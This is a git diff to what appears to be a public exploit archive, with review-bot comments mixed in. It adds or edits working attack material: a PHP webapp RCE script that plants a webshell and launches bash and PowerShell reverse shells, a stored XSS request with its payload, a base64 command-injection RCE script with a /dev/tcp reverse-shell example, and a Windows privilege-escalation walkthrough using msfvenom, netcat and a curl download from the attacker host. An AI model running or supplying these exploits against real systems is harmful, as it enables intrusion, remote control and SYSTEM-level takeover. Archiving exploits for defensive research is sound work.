diff --git a/exploits/php/webapps/50556.py b/exploits/php/webapps/50556.py index c01411073..c16f1ced8 100755 --- a/exploits/php/webapps/50556.py +++ b/exploits/php/webapps/50556.py @@ -49,11 +49,8 @@ class Exploit: } - #Creates user "bypass" and upload a simple webshell without -authentication - request = self.session.post(url, -data=data,headers=self.headers,files={"image":(self.shell_name -+'.php',"")}) + #Creates user "bypass" and upload a simple webshell without authentication + request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"")}) time.sleep(3) if (request.status_code == 200): print('[*] The user and webshell were created\n') @@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name #Use a payload in bash to get a reverse shell payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' - execute_command = -self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) 
@@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload time.sleep(3) #Use a payload in powershell to get a reverse shell - payload = -"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) + payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" - execute_command = -self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: @@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload def get_args(): - parser = argparse.ArgumentParser(description='Laundry Booking -Management System') + parser = argparse.ArgumentParser(description='Laundry Booking Management System') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-s', '--shell_name', dest="shell_name", diff --git a/exploits/php/webapps/50557.txt b/exploits/php/webapps/50557.txt new file mode 100644 index 000000000..13bdeaafc --- /dev/null +++ b/exploits/php/webapps/50557.txt 
@@ -0,0 +1,68 @@
+# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting
+# Date: 2021-08-31
+# Exploit Author: Tushar Jadhav
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 11
+# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/
+# CVE: CVE-2021-40577
+
+=============================================================================================================================
+
+Stored Cross-site scripting(XSS):
+
+Stored attacks are those where the injected script is permanently stored on
+the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it
+requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+==============================================================================================================================
+
+Attack vector:
+
+This vulnerability can result in the attacker can injecting the XSS payload
+in the User Registration section. Each time the admin login or basic user
+Login in the admin panel, the XSS triggers and attacker can able to steal
+the cookie according to the crafted payload.
+
+===============================================================================================================================
+
+Vulnerable Parameters: Name
+
+===============================================================================================================================
+
+Steps for reproducing:
+
+1. Go to add users section
+2. fill in the details. & put
+payload in Name parameter.
+3. Once we click on save, We can see the XSS has been triggered.
+
+================================================================================================================================
+
+Request :
+
+POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1
+Host: 192.168.1.205:81
+Content-Length: 133
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.205:81
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3
+Connection: close
+
+deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save=
+
+===================================================================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/50559.py b/exploits/php/webapps/50559.py
new file mode 100755
index 000000000..54f81c734
--- /dev/null
+++ b/exploits/php/webapps/50559.py
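Review bot: The "Vulnerable Parameters" line names the field `Name`, while the title and the captured request body identify it as `U_NAME`; the two should agree so the entry can be matched against the application's actual input field. The advisory also stops at reproduction and gives no remediation, which is what a reader triaging the finding needs most; a closing line such as `Mitigation: HTML-encode U_NAME (htmlspecialchars) wherever the admin panel renders user records, since the value is stored unescaped and echoed on login.` would make it actionable. The request body sends `deptid` three times, which deserves a sentence if it is deliberate rather than a capture artefact.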
@@ -0,0 +1,65 @@ +# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE) +# Date: November 30, 2021 +# Exploit Author: Nicole Daniella Murillo Mejias +# Version: Advanced Comment System 1.0 +# Tested on: Linux + +#!/usr/bin/env python3 + +# DESCRIPTION: +# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the +# response is filtered by the randomly generated alphanumeric string and only command output +# is displayed. +# +# USAGE: +# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted +# If any special characters are used, they should be quoted with single quotes. +# +# Example: +# +# python3 acspoc.py uname -a +# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1' + +import sys +import base64 +import requests +import random + +def generate_string(size): + str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" + return ''.join(random.choice(str) for i in range(size)) + +def exploit(cmd): + + # TODO: Change the URL to the target host + url = 'http://127.0.0.1/advanced_comment_system/index.php' + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + encoded_cmd = base64.b64encode(cmd) + + delimiter = generate_string(6).encode() + + body = b'ACS_path=php://input%00&cbcmd=' + body += encoded_cmd + body += b'&' + + try: + result = requests.post(url=url, headers=headers, data=body) + except KeyboardInterrupt: + print("Keyboard interrupt detected.") + sys.exit() + + if f'{delimiter.decode()}: ' in result.text: + position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ") + + if len(result.text[position:]) > 0: + print(result.text[position:]) + else: + print(f"No output from command '{cmd.decode()}'") + print(f"Response size from target host: {len(result.text)} bytes") + +if __name__ == "__main__": + exploit(' '.join(sys.argv[1:]).encode()) \ No newline at end of file 
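Review bot: The `#!/usr/bin/env python3` line sits after five comment lines, so it is an ordinary comment and the file is not directly executable despite its 100755 mode; it belongs on the first line. In `generate_string`, the local `str` shadows the builtin of the same name and the loop variable `i` is unused, so `alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"` and `for _ in range(size)` read better. The header block is also missing the Vendor Homepage and Software Link lines that the sibling entries in this commit carry.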
diff --git a/exploits/windows/local/50558.txt b/exploits/windows/local/50558.txt
new file mode 100644
index 000000000..8a7f596ed
--- /dev/null
+++ b/exploits/windows/local/50558.txt
@@ -0,0 +1,126 @@
+# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation
+# Date: 2021-07-19
+# Author: Alessandro 'mindsflee' Salzano
+# Vendor Homepage: https://millegpg.it/
+# Software Homepage: https://millegpg.it/
+# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe
+# Version: 5.7.2
+# Tested on: Microsoft Windows 10 Enterprise x64
+
+MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute".
+
+Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
+
+Affected version: MilleGPG5 5.7.2
+
+# Details
+# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below.
+# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
+# with a malicious file that would connect back to an attacking computer giving system level privileges
+# (nt authority\system) due to the service running as Local System.
+# While a low privilege user is unable to restart the service through the application, a restart of the
+# computer triggers the execution of the malicious file.
+
+(1) Impacted services.
+Any low privileged user can elevate their privileges abusing these services:
+
+C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe
+C:\Program Files\MilleGPG5\GPGService.exe
+
+
+ Details:
+
+
+SERVICE_NAME: MariaDB-GPG
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program
+Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : MariaDB-GPG
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+------
+
+SERVICE_NAME: GPGOrchestrator
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe"
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : GPG Orchestrator
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+(2) Folder permissions.
+Insecure folders permissions issue:
+
+
+C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT
+SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT
+AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE
+AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE
+AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ ...[SNIP]...
+---------------
+
+C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED
+APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+
+
+ # Proof of Concept
+
+1. Generate malicious .exe on attacking machine
+ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
+
+2. Setup listener and ensure apache is running on attacking machine
+ nc -lvp 4242
+ service apache2 start
+
+3. Download malicious .exe on victim machine
+ type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe"
+
+4. Overwrite file and copy malicious .exe.
+ Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak
+ Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
+
+5. Restart victim machine
+
+6. Reverse Shell on attacking machine opens
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f5ce15abe..948e78a50 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
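Review bot: The "# Details" block attributes the weak permissions to the Authenticated Users group, but the icacls output below it shows `BUILTIN\Users:(OI)(CI)(F)` on `C:\Program Files\MilleGPG5` (an explicit, non-inherited ACE) and the inherited `BUILTIN\Users:(I)(OI)(CI)(F)` on the bin folder; the text should name the principal the listing actually records, since that is what a defender will search for. The advisory also ends at the proof of concept with no remediation, so a closing line such as `Fix: remove the Full-control ACE for BUILTIN\Users from C:\Program Files\MilleGPG5 so the tree inherits the default Program Files ACL, then re-check with icacls` would make it actionable. From the detection side, the observable the write-up supports is the MariaDB-GPG service launching a `mysqld.exe` whose hash differs from the installed binary, or a `mysqld.bak` appearing in that bin folder.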
@@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows,
 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux,
 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
+50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port
 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
+50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
+50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
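Review bot: The 50559 row in the second hunk records the author as `"Murillo Mejias"`, while the header of exploits/php/webapps/50559.py in this same commit gives `Nicole Daniella Murillo Mejias`; the other two new rows keep the author's full name (50557 → `Tushar Jadhav`, 50558 → `Alessandro Salzano`), so this one should too: `50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Nicole Daniella Murillo Mejias",webapps,php,`. The 50558 title also drops the `(x64)` qualifier that the file header carries, which is fine if the index intentionally normalises titles, but is worth confirming against the other local entries.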